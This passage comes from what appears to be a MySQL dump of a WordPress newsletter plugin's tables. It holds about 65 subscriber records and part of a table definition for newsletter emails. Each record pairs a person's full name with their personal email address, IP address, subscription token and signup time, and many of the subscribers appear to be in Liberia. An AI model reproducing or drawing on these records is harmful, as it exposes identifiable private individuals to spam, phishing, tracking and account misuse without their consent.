03:44:04',1655351044,0,0,0,0,'','n',0,0,'page','41.191.107.52',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('David S. Menjor','davidmenjor921@gmail.com','9db2bd09a1','','C',44,NULL,'2022-07-07 16:24:49',1657211089,0,0,0,0,'','n',0,0,'page','41.191.105.93',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Zainab Bah','kantibera2@gmail.com','3a1933a4b4','','C',45,NULL,'2022-08-03 18:49:05',1659552545,0,0,0,0,'','n',0,0,'page','41.57.95.249',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Titus Karderic Williams ','willderic@gmail.com','e29f8deedf','','C',46,NULL,'2022-08-03 18:59:22',1659553162,0,0,0,0,'','n',0,0,'page','105.71.17.137',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Robert Blobagar Boe','blobagarblobagar@gmail.com','9b09352dfe','','C',47,NULL,'2022-08-04 13:51:01',1659621061,0,0,0,0,'','n',0,0,'page','41.191.104.114',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Lorpu Kabadeh','lorpukabadeh@gmail.com','81f5593449','','C',48,NULL,'2022-08-04 13:55:43',1659621343,0,0,0,0,'','n',0,0,'page','41.57.95.164',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('J. McCarthy Sieh','mccarthysieh1999@gmail.com','0b350c95bb','','C',49,NULL,'2022-08-04 23:34:36',1659656076,0,0,0,0,'','n',0,0,'page','41.57.95.141',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Barchue Brown','stick2g7@yahoo.com','487241d5d8','','C',50,NULL,'2022-08-08 01:03:06',1659920586,0,0,0,0,'','n',0,0,'page','41.191.104.41',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Eleazar Samuel Barclay','elbclay1@gmail.com','b0c46e9232','','C',51,NULL,'2022-09-13 14:21:34',1663078894,0,0,0,0,'','n',0,0,'page','41.57.95.195',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Nelson Karzrah Gonwoe ','kgonwoe@gmail.com','a5d0a81968','','C',52,NULL,'2022-09-13 16:28:06',1663086486,0,0,0,0,'','n',0,0,'page','41.57.95.15',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Victor M Paasewe ','vmpaasewe18@gmail.com','96b5bc0d97','','C',53,NULL,'2022-09-14 01:41:03',1663119663,0,0,0,0,'','n',0,0,'page','41.57.95.57',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Rob Kutzman','4062420207@vtext.com','3dd972a6ed','','C',54,NULL,'2022-10-17 15:49:07',1666021747,0,0,0,0,'','n',0,0,'page','216.14.241.82',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Jacob Tweh','jacobtweh1990@gmail.com','32a5d06deb','','C',55,NULL,'2022-10-17 15:49:21',1666021761,0,0,0,0,'','n',0,0,'page','41.191.107.48',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Rob Kutzman','4062420207@txt.att.net','a05171342d','','C',56,NULL,'2022-10-17 15:49:50',1666021790,0,0,0,0,'','n',0,0,'page','216.14.241.82',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('TECKLAY TELEWODA','tecklaytelewoda@gmail.com','081847edcd','','C',57,NULL,'2022-10-21 06:11:59',1666332719,0,0,0,0,'','n',0,0,'page','41.210.141.16',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('PRINCE KONAH','pskonah18@gmail.com','74f141aea3','','C',58,NULL,'2022-11-29 20:26:05',1669753565,0,0,0,0,'','n',0,0,'page','41.57.95.200',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Fiona','fiona.gallagher@weellsfargo.com','a6a74d02fc','','C',59,NULL,'2022-12-25 14:45:43',1671979543,0,0,0,0,'','n',0,0,'page','208.105.189.231',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Ephraim M Jarjugwiah ','jarjugemixzzy@gmail.com','9fe3af2efa','','C',60,NULL,'2023-01-16 08:39:06',1673858346,0,0,0,0,'','n',0,0,'page','41.57.95.191',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('KELLI','kcjones87@gmail.com','34464030a5','','C',61,NULL,'2023-02-11 07:51:57',1676101917,0,0,0,0,'','n',0,0,'page','70.177.63.175',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Baiyezenah','rbrown@epa.gov.lr','dbf731654d','','C',62,NULL,'2023-02-25 03:29:43',1677295783,0,0,0,0,'','n',0,0,'page','41.191.104.162',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('EL-John Dono Eddie','eddieeljohn6@gmail.com','c83e6513df','','C',63,NULL,'2023-05-09 14:29:16',1683642556,0,0,0,0,'','n',0,0,'page','41.86.12.2',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('William W. Hall','hallwilliam710@gmail.com','129179b859','','C',64,NULL,'2023-06-15 13:40:30',1686836430,0,0,0,0,'','n',0,0,'page','41.191.104.112',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Amos Brown, Jr','brownjramos03@gmail.com','81382f44d8','','C',65,NULL,'2023-07-05 16:28:27',1688574507,0,0,0,0,'','n',0,0,'','41.191.104.83',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Moses T. Korkollie ','korkolliemoses10@gmail.com','89396d7a67','','C',66,NULL,'2024-02-25 19:25:10',1708889110,0,0,0,0,'','n',0,0,'','41.57.95.207',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Torwon S. Duo','torwonduo3@gmail.com','98f5ab9f09','','C',67,NULL,'2025-10-19 20:06:56',1760904416,0,0,0,0,'','n',0,0,'','102.214.137.180',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Yarmah Gegbee ','yarmahge@gmail.com','0c66085771','','C',68,NULL,'2025-12-01 18:43:57',1764614637,0,0,0,0,'','n',0,0,'','102.214.137.135',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Marina ','williamabbam13@gmail.com','6f1e53d0f0','','C',69,NULL,'2025-12-02 08:52:16',1764665536,0,0,0,0,'','n',0,0,'','143.105.145.77',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Jallah Lamine Acquoilakpa ','acquoilakpajallah34@gmail.com','5a69d3ee15','','C',70,NULL,'2025-12-02 17:26:30',1764696390,0,0,0,0,'','n',0,0,'','41.191.104.96',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Michael D Sango ','dmichaelsango@gmail.com','5359b6683c','','C',71,NULL,'2025-12-02 18:30:02',1764700202,0,0,0,0,'','n',0,0,'','41.57.95.106',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Destiny A Tokpah jr ','destinyaikejr1997@gmail.com','9afba49c87','','C',72,NULL,'2026-01-08 12:05:00',1767873900,0,0,0,0,'','n',0,0,'','41.191.104.66',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Stephen Gonkarnue','gonkarnues1983@gmail.com','71a00994b2','','C',73,NULL,'2026-01-16 22:16:57',1768601817,0,0,0,0,'','n',0,0,'','41.57.95.219',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Richard M. Sanford ','richardsanford3@gmail.com','e8b5e4ba6b','','C',74,NULL,'2026-01-21 10:30:30',1768991430,0,0,0,0,'','n',0,0,'','143.105.145.241',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Galima K Jallah','jallahgalima74@gmail.com','3a0d19d02f','','C',75,NULL,'2026-01-21 10:33:59',1768991639,0,0,0,0,'','n',0,0,'','41.57.95.224',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('M Steven Wologo, Sr.','mstevenwologo@gmail.com','50b95e7aed','','C',76,NULL,'2026-01-21 10:42:34',1768992154,0,0,0,0,'','n',0,0,'','102.214.138.65',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('T. Howison Abraham Woah','thowisonawoah98@gmail.com','6f7a4703ce','','C',77,NULL,'2026-01-21 11:02:25',1768993345,0,0,0,0,'','n',0,0,'','41.191.104.117',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Emma Kennedy ','kennedyemma917@gmail.com','03439dd74b','','C',78,NULL,'2026-01-21 11:44:43',1768995883,0,0,0,0,'','n',0,0,'','41.57.95.116',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Decontee M Browne ','decobrowne1995@gmail.com','514aaf24d9','','C',79,NULL,'2026-01-21 13:35:48',1769002548,0,0,0,0,'','n',0,0,'','41.191.104.116',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Josephine Kolleh ','josephinekolleh9@gmail.com','c8c614060c','','C',80,NULL,'2026-01-21 13:37:13',1769002633,0,0,0,0,'','n',0,0,'','102.214.138.121',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Josephine Kolleh ','josephinekollwh9@gmail.com','87e8d46b9b','','C',81,NULL,'2026-01-21 13:38:44',1769002724,0,0,0,0,'','n',0,0,'','102.214.138.121',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Alfred C. Johnson','johnsonalfredc@gmail.com','22ccfe291d','','C',82,NULL,'2026-01-21 18:25:39',1769019939,0,0,0,0,'','n',0,0,'','143.105.145.122',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Merlin ','merlintotimeh7@gmail.com','8c5741523e','','C',83,NULL,'2026-01-21 20:32:43',1769027563,0,0,0,0,'','n',0,0,'','143.105.145.32',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Christopher M Kamara ','ckamara34@gmail.com','3687025fce','','C',84,NULL,'2026-01-21 21:49:26',1769032166,0,0,0,0,'','n',0,0,'','102.214.138.100',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Festus M.Wongbay ','festuswongbay38@gmail.com','25673bed2c','','C',85,NULL,'2026-01-21 21:58:52',1769032732,0,0,0,0,'','n',0,0,'','41.191.104.64',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('D. SAKAGIPO NAGBE, SR ','dsakagipo@gmail.com','64545a45e6','','C',86,NULL,'2026-01-22 01:11:30',1769044290,0,0,0,0,'','n',0,0,'','102.214.137.146',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Vivian Menlor ','menlorvivian38@gmail.com','aa925b62ef','','C',87,NULL,'2026-01-22 08:49:06',1769071746,0,0,0,0,'','n',0,0,'','41.57.95.156',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Jimmy Johnson ','jj20144jj@gmail.com','e5e7233e51','','C',88,NULL,'2026-01-22 09:09:52',1769072992,0,0,0,0,'','n',0,0,'','143.105.145.43',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Daniel A Tokpah ','danielalvestokpah296@gmail.com','f825734fb4','','C',89,NULL,'2026-01-22 11:43:55',1769082235,0,0,0,0,'','n',0,0,'','41.57.95.108',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Tilewoe Mercy. Plator ','tilewoeplator@gmail.com','5510e30fea','','C',90,NULL,'2026-01-22 17:46:45',1769104005,0,0,0,0,'','n',0,0,'','41.57.95.93',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Aletha F Monbo ','momoalethafaith@gmail.com','6ebefd13d7','','C',91,NULL,'2026-01-22 21:53:24',1769118804,0,0,0,0,'','n',0,0,'','143.105.145.215',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Edme M Russell ','edmerussell53@gmail.com','ddfc0b92bf','','C',92,NULL,'2026-01-23 12:25:37',1769171137,0,0,0,0,'','n',0,0,'','41.57.95.198',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Moscilla Etta Neufville ','moscillaneufville5@gmail.com','fef3962b46','','C',93,NULL,'2026-01-23 16:19:32',1769185172,0,0,0,0,'','n',0,0,'','154.161.159.118',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Hawa J. Taylor ','hawataylor565@gmail.com','b16b889e60','','C',94,NULL,'2026-01-23 22:08:37',1769206117,0,0,0,0,'','n',0,0,'','41.191.104.232',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Levi Nya Paye','payeln2023@gmail.com','975b6628bc','','C',95,NULL,'2026-01-28 00:12:22',1769559142,0,0,0,0,'','n',0,0,'','196.96.112.222',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('John T. Munyeneh ','johnmunyeneh029@gmail.com','777c609ead','','C',96,NULL,'2026-01-30 22:47:15',1769813235,0,0,0,0,'','n',0,0,'','102.214.138.75',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('SAAH JJ KETTOR','skettor230@gmail.com','591d1c5a0c','','C',97,NULL,'2026-02-04 20:40:31',1770237631,0,0,0,0,'','n',0,0,'','143.105.145.94',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Exodus D. M. Sankapue ','exodusdmsankapue14@gmail.com','b987d5ebac','','C',98,NULL,'2026-02-09 21:51:05',1770673865,0,0,0,0,'','n',0,0,'','41.57.95.203',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Exodus D. M. Sankapue ','sankapueexodusdm@gmail.com','262e25daee','','C',99,NULL,'2026-02-09 22:12:15',1770675135,0,0,0,0,'','n',0,0,'','41.57.95.203',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('William D  Akoi','akoiwilliam688@gmail.com','47fc9f1e61','','C',100,NULL,'2026-02-20 23:28:24',1771630104,0,0,0,0,'','n',0,0,'','41.191.104.77',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Priscilla T Diggs ','priscillatdiggs@gmail.com','af0813fb1e','','C',101,NULL,'2026-02-23 11:49:51',1771847391,0,0,0,0,'','n',0,0,'','41.57.95.36',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Isaac Kollie ','ikollie710@gmail.com','43ccd879c7','','C',102,NULL,'2026-02-23 14:33:40',1771857220,0,0,0,0,'','n',0,0,'','41.57.95.185',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('smith k. Jallah','jallahsmith35@gmail.com','c4f0dd9f09','','C',103,NULL,'2026-02-26 22:29:54',1772144994,0,0,0,0,'','n',0,0,'','41.57.95.109',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('McSimon P Garvlehn','mgarvlehn88@gmail.com','3786907851','','C',104,NULL,'2026-04-13 09:45:05',1776073505,0,0,0,0,'','n',0,0,'','143.105.145.65',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('James','zayzayjames11@gmail.com','92aa98465a','','C',105,NULL,'2026-04-18 10:55:48',1776509748,0,0,0,0,'','n',0,0,'','102.214.136.51',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('pillo','pillowcase80@gmail.com','11c65788ab','','C',106,NULL,'2026-04-19 17:36:43',1776620203,0,0,0,0,'','n',0,0,'','105.155.254.164',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Maxwell Nyounway ','mnyounway69@gmail.com','e1837c8c01','','C',107,NULL,'2026-05-22 03:27:22',1779420442,0,0,0,0,'','n',0,0,'','41.57.95.180',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Jeremiah Binda ','jeremiahbinda11@gmail.com','256714ec30','','C',108,NULL,'2026-06-18 17:23:11',1781803391,0,0,0,0,'','n',0,0,'','143.105.145.23',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,'');
/*!40000 ALTER TABLE `wp_newsletter` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_newsletter_emails`
--

DROP TABLE IF EXISTS `wp_newsletter_emails`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_newsletter_emails` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `language` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `subject` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message` longtext COLLATE utf8mb4_unicode_ci,
  `subject2` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message2` longtext COLLATE utf8mb4_unicode_ci,
  `name2` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `status` enum('new','sending','sent','paused','error') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'new',
  `total` int(11) NOT NULL DEFAULT '0',
  `last_id` int(11) NOT NULL DEFAULT '0',
  `sent` int(11) NOT NULL DEFAULT '0',
  `track` int(11) NOT NULL DEFAULT '1',
  `list` int(11) NOT NULL DEFAULT '0',
  `type` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `query` longtext COLLATE utf8mb4_unicode_ci,
  `editor` tinyint(4) NOT NULL DEFAULT '0',
  `sex` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `theme` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message_text` longtext COLLATE utf8mb4_unicode_ci,
  `preferences` longtext COLLATE utf8mb4_unicode_ci,
  `send_on` int(11) NOT NULL DEFAULT '0',
  `token` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `options` longtext COLLATE utf8mb4_unicode_ci,
  `private` tinyint(1) NOT NULL DEFAULT '0',
  `click_count` int(10) unsigned NOT NULL DEFAULT '0',
  `version` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `open_count` int(10) unsigned NOT NULL DEFAULT '0',
  `unsub_count` int(10) unsigned NOT NULL DEFAULT '0',
  `error_count` int(10) unsigned NOT NULL DEFAULT '0',
